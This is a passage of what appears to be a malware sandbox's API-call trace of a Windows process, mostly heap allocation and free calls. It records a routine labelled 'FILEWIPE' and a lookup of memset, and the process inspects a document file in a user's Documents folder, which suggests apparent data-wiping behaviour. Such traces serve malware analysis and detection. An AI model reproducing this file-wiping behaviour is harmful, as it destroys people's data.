dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.220] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.220] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\us __ 9clmnku6a.odt")) returned 0x20 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0x31badc20, ftLastWriteTime.dwHighDateTime=0x1d5e09b, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 0x90af58 [0173.220] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.221] CharLowerBuffW (in: lpsz="byte[56905]", cchLength=0xb | out: lpsz="byte[56905]") returned 0xb [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.222] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.223] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.224] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0173.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0173.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.224] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0173.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.225] FreeLibrary (hLibModule=0x75c90000) returned 1 [0173.225] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0173.225] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.225] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.225] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0173.225] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.226] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.227] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0173.227] PeekMessageW (in: 